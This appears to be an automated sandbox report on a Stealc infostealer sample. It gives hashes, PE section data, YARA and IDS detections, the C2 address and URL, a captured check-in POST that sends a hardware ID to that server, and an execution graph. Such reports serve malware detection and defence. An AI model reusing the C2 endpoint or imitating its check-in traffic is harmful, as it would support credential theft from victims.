https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
http://185.215.113.206/6c4adf523b719729.php2 | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpR | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php. | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpt; | file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.2067 | file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1545825
                                    Start date and time:2024-10-31 05:06:05 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 6s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 129
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    No simulations
Match: 185.215.113.206 (IP)
Associated Sample Name | Detection | Threat Name | Context
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | Stealc | 185.215.113.206/746f34465cf17784/vcruntime140.dll
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
• file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                    No context
Match: WHOLESALECONNECTIONSNL (ASN)
Associated Sample Name | Detection | Threat Name | Context
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
• file.exe | malicious | Stealc | 185.215.113.206
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer | 185.215.113.206
• file.exe | malicious | Stealc, Vidar | 185.215.113.206
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | 185.215.113.16
• file.exe | malicious | Stealc | 185.215.113.206
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
• file.exe | malicious | Stealc, Vidar | 185.215.113.206
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
• file.exe | malicious | Stealc | 185.215.113.206
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.957392119438948
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'120'192 bytes
                                    MD5:1bd30bb80448545cc020f946eda1d2f2
                                    SHA1:fdf3333834e0a0d4f2d1ed90c8179a2f76d6d512
                                    SHA256:0eab0f6617a84d6ffdc802b19a9502e7910aace80478d15360685830c84e324e
                                    SHA512:5d694263b5b216b73c26e5fb58a645a160d045bb32f8faf88f0ad4dcf49248bece88e7fe836ed136a7e27c1b3b0e4e86336a37c259f9a24e6636ae269dff8b9b
                                    SSDEEP:49152:mVbwALc7MiUz6WuB0Js1dJHbLf1CGIdxtsOx2vKUX:usALBiUz6Wk0JsDJHnfYlvtrOZ
                                    TLSH:63A533072D1763BDC4EE42B1A1CDF3AA10F1B8216D90DE9225493B354D5B374AA32ED7
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0xb20000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                    Instruction
                                    jmp 00007FC2C84FB94Ah
                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | ca458fc852a3c0fc993f3c8a1e3de85a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x29a000 | 0x200 | c17f98ae0bb9d23aee4a9c51b1d43245 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lvyqwrnu | 0x584000 | 0x19b000 | 0x19a800 | 2632de11e6015a50f95bd8b1ade5a3a3 | False | 0.994952444617844 | data | 7.954065080128192 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fslmoltp | 0x71f000 | 0x1000 | 0x600 | 650ff108ec9bb825b22d376931631563 | False | 0.5859375 | data | 5.016154716857857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x720000 | 0x3000 | 0x2200 | b44a6f1f4a5810175253c34b9cf59cdf | False | 0.07548253676470588 | DOS executable (COM) | 0.8900947642580371 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T05:06:59.243278+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49707 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 05:06:58.030554056 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Oct 31, 2024 05:06:58.035610914 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.6
Oct 31, 2024 05:06:58.035698891 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Oct 31, 2024 05:06:58.037822962 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Oct 31, 2024 05:06:58.042606115 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.6
Oct 31, 2024 05:06:58.951211929 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.6
Oct 31, 2024 05:06:58.951283932 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Oct 31, 2024 05:06:58.956770897 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Oct 31, 2024 05:06:58.961630106 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.6
Oct 31, 2024 05:06:59.243154049 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.6
Oct 31, 2024 05:06:59.243278027 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Oct 31, 2024 05:07:02.655658007 CET | 49707 | 80 | 192.168.2.6 | 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 185.215.113.206 | 80 | 5024 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Oct 31, 2024 05:06:58.037822962 CET | 90 | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 31, 2024 05:06:58.951211929 CET | 203 | IN
HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 04:06:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 31, 2024 05:06:58.956770897 CET | 412 | OUT
POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 38 36 43 34 37 43 46 30 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a
Data Ascii:
------GCBGCAFIIECBFIDHIJKF
Content-Disposition: form-data; name="hwid"

E586C47CF003204970075
------GCBGCAFIIECBFIDHIJKF
Content-Disposition: form-data; name="build"

tale
------GCBGCAFIIECBFIDHIJKF--

Oct 31, 2024 05:06:59.243154049 CET | 210 | IN
HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 04:06:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                                    Target ID:0
                                    Start time:00:06:52
                                    Start date:31/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xac0000
                                    File size:2'120'192 bytes
                                    MD5 hash:1BD30BB80448545CC020F946EDA1D2F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:3.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:1327
                                      Total number of Limit Nodes:24
37808 ad6c80 37806->37808 37807->37808 37809 ad6c78 ExitProcess 37807->37809 37810 ad5d60 37808->37810 37811 ad5d6d 37810->37811 37812 adaa50 lstrcpy 37811->37812 37813 ad5d7e 37812->37813 38046 adab30 lstrlen 37813->38046 37816 adab30 2 API calls 37817 ad5db4 37816->37817 37818 adab30 2 API calls 37817->37818 37819 ad5dc4 37818->37819 38050 ad6680 37819->38050 37822 adab30 2 API calls 37823 ad5de3 37822->37823 37824 adab30 2 API calls 37823->37824 37825 ad5df0 37824->37825 37826 adab30 2 API calls 37825->37826 37827 ad5dfd 37826->37827 37828 adab30 2 API calls 37827->37828 37829 ad5e49 37828->37829 38059 ac26f0 37829->38059 37837 ad5f13 37838 ad6680 lstrcpy 37837->37838 37839 ad5f25 37838->37839 37840 adaab0 lstrcpy 37839->37840 37841 ad5f42 37840->37841 37842 adacc0 4 API calls 37841->37842 37843 ad5f5a 37842->37843 37844 adabb0 lstrcpy 37843->37844 37845 ad5f66 37844->37845 37846 adacc0 4 API calls 37845->37846 37847 ad5f8a 37846->37847 37848 adabb0 lstrcpy 37847->37848 37849 ad5f96 37848->37849 37850 adacc0 4 API calls 37849->37850 37851 ad5fba 37850->37851 37852 adabb0 lstrcpy 37851->37852 37853 ad5fc6 37852->37853 37854 adaa50 lstrcpy 37853->37854 37855 ad5fee 37854->37855 38785 ad7690 GetWindowsDirectoryA 37855->38785 37858 adaab0 lstrcpy 37859 ad6008 37858->37859 38795 ac48d0 37859->38795 37861 ad600e 38940 ad19f0 37861->38940 37863 ad6016 37864 adaa50 lstrcpy 37863->37864 37865 ad6039 37864->37865 37866 ac1590 lstrcpy 37865->37866 37867 ad604d 37866->37867 38956 ac59b0 34 API calls ctype 37867->38956 37869 ad6053 38957 ad1280 lstrlen lstrcpy 37869->38957 37871 ad605e 37872 adaa50 lstrcpy 37871->37872 37873 ad6082 37872->37873 37874 ac1590 lstrcpy 37873->37874 37875 ad6096 37874->37875 38958 ac59b0 34 API calls ctype 37875->38958 37877 ad609c 38959 ad0fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37877->38959 37879 ad60a7 37880 adaa50 lstrcpy 37879->37880 37881 ad60c9 37880->37881 37882 ac1590 lstrcpy 37881->37882 37883 ad60dd 37882->37883 38960 ac59b0 34 
API calls ctype 37883->38960 37885 ad60e3 38961 ad1170 StrCmpCA lstrlen lstrcpy 37885->38961 37887 ad60ee 37888 ac1590 lstrcpy 37887->37888 37889 ad6105 37888->37889 38962 ad1c60 115 API calls 37889->38962 37891 ad610a 37892 adaa50 lstrcpy 37891->37892 37893 ad6126 37892->37893 38963 ac5000 7 API calls 37893->38963 37895 ad612b 37896 ac1590 lstrcpy 37895->37896 37897 ad61ab 37896->37897 38964 ad08a0 287 API calls 37897->38964 37899 ad61b0 37900 adaa50 lstrcpy 37899->37900 37901 ad61d6 37900->37901 37902 ac1590 lstrcpy 37901->37902 37903 ad61ea 37902->37903 38965 ac59b0 34 API calls ctype 37903->38965 37905 ad61f0 38966 ad13c0 StrCmpCA lstrlen lstrcpy 37905->38966 37907 ad61fb 37908 ac1590 lstrcpy 37907->37908 37909 ad623b 37908->37909 38967 ac1ec0 59 API calls 37909->38967 37911 ad6240 37912 ad6250 37911->37912 37913 ad62e2 37911->37913 37914 adaa50 lstrcpy 37912->37914 37915 adaab0 lstrcpy 37913->37915 37916 ad6270 37914->37916 37917 ad62f5 37915->37917 37919 ac1590 lstrcpy 37916->37919 37918 ac1590 lstrcpy 37917->37918 37920 ad6309 37918->37920 37921 ad6284 37919->37921 38971 ac59b0 34 API calls ctype 37920->38971 38968 ac59b0 34 API calls ctype 37921->38968 37924 ad630f 38972 ad37b0 31 API calls 37924->38972 37925 ad628a 38969 ad1520 19 API calls ctype 37925->38969 37928 ad62da 37931 ad635b 37928->37931 37934 ac1590 lstrcpy 37928->37934 37929 ad6295 37930 ac1590 lstrcpy 37929->37930 37932 ad62d5 37930->37932 37933 ad6380 37931->37933 37936 ac1590 lstrcpy 37931->37936 38970 ad4010 67 API calls 37932->38970 37937 ad63a5 37933->37937 37940 ac1590 lstrcpy 37933->37940 37938 ad6337 37934->37938 37939 ad637b 37936->37939 37942 ad63ca 37937->37942 37947 ac1590 lstrcpy 37937->37947 38973 ad4300 58 API calls ctype 37938->38973 38975 ad49d0 88 API calls ctype 37939->38975 37945 ad63a0 37940->37945 37943 ad63ef 37942->37943 37948 ac1590 lstrcpy 37942->37948 37949 ad6414 37943->37949 37955 ac1590 lstrcpy 37943->37955 38976 ad4e00 61 API calls ctype 37945->38976 37946 ad633c 
37951 ac1590 lstrcpy 37946->37951 37952 ad63c5 37947->37952 37954 ad63ea 37948->37954 37957 ad6439 37949->37957 37958 ac1590 lstrcpy 37949->37958 37956 ad6356 37951->37956 38977 ad4fc0 65 API calls 37952->38977 38978 ad5190 63 API calls ctype 37954->38978 37961 ad640f 37955->37961 38974 ad5350 44 API calls 37956->38974 37959 ad6460 37957->37959 37964 ac1590 lstrcpy 37957->37964 37963 ad6434 37958->37963 37965 ad6470 37959->37965 37966 ad6503 37959->37966 38979 ac7770 107 API calls ctype 37961->38979 38980 ad52a0 61 API calls ctype 37963->38980 37969 ad6459 37964->37969 37971 adaa50 lstrcpy 37965->37971 37970 adaab0 lstrcpy 37966->37970 38981 ad91a0 46 API calls ctype 37969->38981 37973 ad6516 37970->37973 37974 ad6491 37971->37974 37975 ac1590 lstrcpy 37973->37975 37976 ac1590 lstrcpy 37974->37976 37977 ad652a 37975->37977 37978 ad64a5 37976->37978 38985 ac59b0 34 API calls ctype 37977->38985 38982 ac59b0 34 API calls ctype 37978->38982 37981 ad64ab 38983 ad1520 19 API calls ctype 37981->38983 37982 ad6530 38986 ad37b0 31 API calls 37982->38986 37985 ad64fb 37988 adaab0 lstrcpy 37985->37988 37986 ad64b6 37987 ac1590 lstrcpy 37986->37987 37989 ad64f6 37987->37989 37990 ad654c 37988->37990 38984 ad4010 67 API calls 37989->38984 37992 ac1590 lstrcpy 37990->37992 37993 ad6560 37992->37993 38987 ac59b0 34 API calls ctype 37993->38987 37995 ad656c 37997 ad6588 37995->37997 38988 ad68d0 9 API calls ctype 37995->38988 37997->37642 37999 ac4621 RtlAllocateHeap 37998->37999 38001 ac4671 VirtualProtect 37999->38001 38001->37647 38003->37734 38005 ac10c2 ctype 38004->38005 38006 ac10fd 38005->38006 38007 ac10e2 VirtualFree 38005->38007 38006->37764 38007->38006 38009 ac1233 GlobalMemoryStatusEx 38008->38009 38009->37768 38010->37791 38013 adaad2 38011->38013 38012 adaafc 38012->37796 38013->38012 38014 adaaea lstrcpy 38013->38014 38014->38012 38016 adaa50 lstrcpy 38015->38016 38017 ad6ad3 38016->38017 38018 adacc0 4 API calls 38017->38018 38019 ad6ae5 38018->38019 38020 adabb0 
lstrcpy 38019->38020 38021 ad6aee 38020->38021 38022 adacc0 4 API calls 38021->38022 38023 ad6b07 38022->38023 38024 adabb0 lstrcpy 38023->38024 38025 ad6b10 38024->38025 38026 adacc0 4 API calls 38025->38026 38027 ad6b2a 38026->38027 38028 adabb0 lstrcpy 38027->38028 38029 ad6b33 38028->38029 38030 adacc0 4 API calls 38029->38030 38031 ad6b4c 38030->38031 38032 adabb0 lstrcpy 38031->38032 38033 ad6b55 38032->38033 38034 adacc0 4 API calls 38033->38034 38035 ad6b6f 38034->38035 38036 adabb0 lstrcpy 38035->38036 38037 ad6b78 38036->38037 38038 adacc0 4 API calls 38037->38038 38039 ad6b93 38038->38039 38040 adabb0 lstrcpy 38039->38040 38041 ad6b9c 38040->38041 38042 adaab0 lstrcpy 38041->38042 38043 ad6bb0 38042->38043 38043->37803 38045 adab22 38044->38045 38045->37806 38047 adab4f 38046->38047 38048 ad5da4 38047->38048 38049 adab8b lstrcpy 38047->38049 38048->37816 38049->38048 38051 adabb0 lstrcpy 38050->38051 38052 ad6693 38051->38052 38053 adabb0 lstrcpy 38052->38053 38054 ad66a5 38053->38054 38055 adabb0 lstrcpy 38054->38055 38056 ad66b7 38055->38056 38057 adabb0 lstrcpy 38056->38057 38058 ad5dd6 38057->38058 38058->37822 38060 ac4610 2 API calls 38059->38060 38061 ac2704 38060->38061 38062 ac4610 2 API calls 38061->38062 38063 ac2727 38062->38063 38064 ac4610 2 API calls 38063->38064 38065 ac2740 38064->38065 38066 ac4610 2 API calls 38065->38066 38067 ac2759 38066->38067 38068 ac4610 2 API calls 38067->38068 38069 ac2786 38068->38069 38070 ac4610 2 API calls 38069->38070 38071 ac279f 38070->38071 38072 ac4610 2 API calls 38071->38072 38073 ac27b8 38072->38073 38074 ac4610 2 API calls 38073->38074 38075 ac27e5 38074->38075 38076 ac4610 2 API calls 38075->38076 38077 ac27fe 38076->38077 38078 ac4610 2 API calls 38077->38078 38079 ac2817 38078->38079 38080 ac4610 2 API calls 38079->38080 38081 ac2830 38080->38081 38082 ac4610 2 API calls 38081->38082 38083 ac2849 38082->38083 38084 ac4610 2 API calls 38083->38084 38085 ac2862 38084->38085 38086 ac4610 2 API 
calls 38085->38086 38087 ac287b 38086->38087 38088 ac4610 2 API calls 38087->38088 38089 ac2894 38088->38089 38090 ac4610 2 API calls 38089->38090 38091 ac28ad 38090->38091 38092 ac4610 2 API calls 38091->38092 38093 ac28c6 38092->38093 38094 ac4610 2 API calls 38093->38094 38095 ac28df 38094->38095 38096 ac4610 2 API calls 38095->38096 38097 ac28f8 38096->38097 38098 ac4610 2 API calls 38097->38098 38099 ac2911 38098->38099 38100 ac4610 2 API calls 38099->38100 38101 ac292a 38100->38101 38102 ac4610 2 API calls 38101->38102 38103 ac2943 38102->38103 38104 ac4610 2 API calls 38103->38104 38105 ac295c 38104->38105 38106 ac4610 2 API calls 38105->38106 38107 ac2975 38106->38107 38108 ac4610 2 API calls 38107->38108 38109 ac298e 38108->38109 38110 ac4610 2 API calls 38109->38110 38111 ac29a7 38110->38111 38112 ac4610 2 API calls 38111->38112 38113 ac29c0 38112->38113 38114 ac4610 2 API calls 38113->38114 38115 ac29d9 38114->38115 38116 ac4610 2 API calls 38115->38116 38117 ac29f2 38116->38117 38118 ac4610 2 API calls 38117->38118 38119 ac2a0b 38118->38119 38120 ac4610 2 API calls 38119->38120 38121 ac2a24 38120->38121 38122 ac4610 2 API calls 38121->38122 38123 ac2a3d 38122->38123 38124 ac4610 2 API calls 38123->38124 38125 ac2a56 38124->38125 38126 ac4610 2 API calls 38125->38126 38127 ac2a6f 38126->38127 38128 ac4610 2 API calls 38127->38128 38129 ac2a88 38128->38129 38130 ac4610 2 API calls 38129->38130 38131 ac2aa1 38130->38131 38132 ac4610 2 API calls 38131->38132 38133 ac2aba 38132->38133 38134 ac4610 2 API calls 38133->38134 38135 ac2ad3 38134->38135 38136 ac4610 2 API calls 38135->38136 38137 ac2aec 38136->38137 38138 ac4610 2 API calls 38137->38138 38139 ac2b05 38138->38139 38140 ac4610 2 API calls 38139->38140 38141 ac2b1e 38140->38141 38142 ac4610 2 API calls 38141->38142 38143 ac2b37 38142->38143 38144 ac4610 2 API calls 38143->38144 38145 ac2b50 38144->38145 38146 ac4610 2 API calls 38145->38146 38147 ac2b69 38146->38147 38148 ac4610 2 API calls 
38147->38148 38149 ac2b82 38148->38149 38150 ac4610 2 API calls 38149->38150 38151 ac2b9b 38150->38151 38152 ac4610 2 API calls 38151->38152 38153 ac2bb4 38152->38153 38154 ac4610 2 API calls 38153->38154 38155 ac2bcd 38154->38155 38156 ac4610 2 API calls 38155->38156 38157 ac2be6 38156->38157 38158 ac4610 2 API calls 38157->38158 38159 ac2bff 38158->38159 38160 ac4610 2 API calls 38159->38160 38161 ac2c18 38160->38161 38162 ac4610 2 API calls 38161->38162 38163 ac2c31 38162->38163 38164 ac4610 2 API calls 38163->38164 38165 ac2c4a 38164->38165 38166 ac4610 2 API calls 38165->38166 38167 ac2c63 38166->38167 38168 ac4610 2 API calls 38167->38168 38169 ac2c7c 38168->38169 38170 ac4610 2 API calls 38169->38170 38171 ac2c95 38170->38171 38172 ac4610 2 API calls 38171->38172 38173 ac2cae 38172->38173 38174 ac4610 2 API calls 38173->38174 38175 ac2cc7 38174->38175 38176 ac4610 2 API calls 38175->38176 38177 ac2ce0 38176->38177 38178 ac4610 2 API calls 38177->38178 38179 ac2cf9 38178->38179 38180 ac4610 2 API calls 38179->38180 38181 ac2d12 38180->38181 38182 ac4610 2 API calls 38181->38182 38183 ac2d2b 38182->38183 38184 ac4610 2 API calls 38183->38184 38185 ac2d44 38184->38185 38186 ac4610 2 API calls 38185->38186 38187 ac2d5d 38186->38187 38188 ac4610 2 API calls 38187->38188 38189 ac2d76 38188->38189 38190 ac4610 2 API calls 38189->38190 38191 ac2d8f 38190->38191 38192 ac4610 2 API calls 38191->38192 38193 ac2da8 38192->38193 38194 ac4610 2 API calls 38193->38194 38195 ac2dc1 38194->38195 38196 ac4610 2 API calls 38195->38196 38197 ac2dda 38196->38197 38198 ac4610 2 API calls 38197->38198 38199 ac2df3 38198->38199 38200 ac4610 2 API calls 38199->38200 38201 ac2e0c 38200->38201 38202 ac4610 2 API calls 38201->38202 38203 ac2e25 38202->38203 38204 ac4610 2 API calls 38203->38204 38205 ac2e3e 38204->38205 38206 ac4610 2 API calls 38205->38206 38207 ac2e57 38206->38207 38208 ac4610 2 API calls 38207->38208 38209 ac2e70 38208->38209 38210 ac4610 2 API calls 38209->38210 
